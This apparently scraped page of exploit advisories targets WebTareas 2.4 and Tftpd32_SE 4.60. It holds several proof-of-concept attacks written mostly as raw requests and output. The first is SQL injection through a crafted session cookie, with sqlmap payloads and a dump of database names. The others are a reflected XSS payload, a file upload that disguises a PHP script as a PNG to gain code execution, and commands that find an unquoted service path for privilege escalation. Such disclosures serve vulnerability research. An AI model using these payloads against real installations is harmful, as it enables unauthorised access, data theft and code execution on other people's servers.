../service_site/home.php?msg=permissiondenied<br />Content-Length: 0<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />GET /webtareas/administration/admin.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout<br />Connection: close<br />Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 302 Found<br />Date: Sat, 15 Oct 2022 11:38:39 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: ../service_site/home.php?msg=permissiondenied<br />Content-Length: 355<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br /><br /><b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br /><br /><br />-----------------------------------------------------------------------------------------------------------------------<br />SQLMap:<br />-----------------------------------------------------------------------------------------------------------------------<br />sqlmap resumed the following injection point(s) from stored session:<br />---<br />Parameter: Cookie #1* ((custom) HEADER)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br /> <br /> [11:49:03] [INFO] testing MySQL<br /> [11:49:03] [INFO] confirming MySQL<br /> do you want to URL encode cookie values (implementation specific)? [Y/n] Y<br /> [11:49:03] [INFO] the back-end DBMS is MySQL<br /> web application technology: PHP 7.4.30, Apache 2.4.54<br /> back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)<br /> [11:49:03] [INFO] fetching database names<br /> [11:49:04] [INFO] starting 6 threads<br /> [11:49:06] [INFO] retrieved: 'zxcv'<br /> [11:49:06] [INFO] retrieved: 'information_schema'<br /> [11:49:06] [INFO] retrieved: 'performance_schema'<br /> [11:49:06] [INFO] retrieved: 'test'<br /> [11:49:06] [INFO] retrieved: 'phpmyadmin'<br /> [11:49:06] [INFO] retrieved: 'mysql'<br /> available databases [6]:<br /> [*] information_schema<br /> [*] mysql<br /> [*] performance_schema<br /> [*] phpmyadmin<br /> [*] test<br /> [*] zxcv<br /><br /> [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'<br /> [11:49:06] [WARNING] your sqlmap version is outdated<br /><br /> [*] ending @ 11:49:06 /2022-10-15/<br /><br /><br /></code></pre>
<pre><code># Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)<br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://sourceforge.net/projects/webtareas/<br /># Software Link: https://sourceforge.net/projects/webtareas/<br /># Version: 2.4<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Proof Of Concept <br />-----------------------------------------------------------------------------------------------------------------------<br />Param: searchtype<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple<br />Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 07:46:31 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-XSS-Protection: 1; mode=block<br />X-Frame-Options: SAMEORIGIN<br />X-Content-Type-Options: nosniff<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 11147<br />[...]<br /><form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)"><br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Other vulnerable url and params:<br />-----------------------------------------------------------------------------------------------------------------------<br />/webtareas/administration/print_layout.php [doc_type]<br />/webtareas/general/login.php [logout]<br />/webtareas/general/login.php [session]<br />/webtareas/general/newnotifications.php [msg]<br />/webtareas/general/search.php [searchtype]<br />/webtareas/administration/print_layout.php [doc_type]<br /> <br /><br /><br /></code></pre>
<pre><code># Exploit Title: WebTareas 2.4 - RCE (Authorized)<br /># Date: 15/10/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://sourceforge.net/projects/webtareas/<br /># Software Link: https://sourceforge.net/projects/webtareas/<br /># Version: 2.4<br /># Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />## Example in forum -> members forum -> chat<br />-----------------------------------------------------------------------------------------------------------------------<br />Param: chatPhotos0<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br />POST /webtareas/includes/chattab_serv.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: */*<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126<br />Content-Length: 6852<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add<br />Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------13392153614835728094189311126<br />Content-Disposition: form-data; name="action"<br /><br />sendPhotos<br />-----------------------------13392153614835728094189311126<br />Content-Disposition: form-data; name="chatTo"<br /><br />2<br />-----------------------------13392153614835728094189311126<br />Content-Disposition: form-data; name="chatType"<br /><br />P<br />-----------------------------13392153614835728094189311126<br />Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"<br />Content-Type: image/png<br /><br />PNG<br />[...]<br /><?php phpinfo();?><br />[...]<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 11:27:41 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 661<br />Connection: close<br />Content-Type: application/json<br /><br />{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />See link: /files\/Messages\/7.php<br />-----------------------------------------------------------------------------------------------------------------------<br />Req:<br />-----------------------------------------------------------------------------------------------------------------------<br />GET /webtareas/files/Messages/7.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0<br />Accept: image/avif,image/webp,*/*<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add<br />Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1<br />Sec-Fetch-Dest: image<br />Sec-Fetch-Mode: no-cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Sat, 15 Oct 2022 11:28:16 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 89945<br />[...]<br /><title>PHP 7.4.30 - phpinfo()</title><br />[...]<br /><h1 class="p">PHP Version 7.4.30</h1><br /></td></tr><br /></table><br /><table><br /><tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr><br /><tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr><br /><tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 <br />[...]<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path<br /># Discovery by: Ismael Nava<br /># Discovery Date: 10-13-2022<br /># Vendor Homepage: https://pjo2.github.io/tftpd64/<br /># Software Links : https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32_SE-4.60-setup.exe<br /># Tested Version: 4.60<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 10 Home 64 bits<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """<br /><br />Tftpd32 service edition Tftpd32_svc C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe Auto<br /><br />C:\>sc qc Tftpd32_svc<br /><br />NOMBRE_SERVICIO: Tftpd32_svc<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : Tftpd32 service edition<br /> DEPENDENCIAS :<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /><br /></code></pre>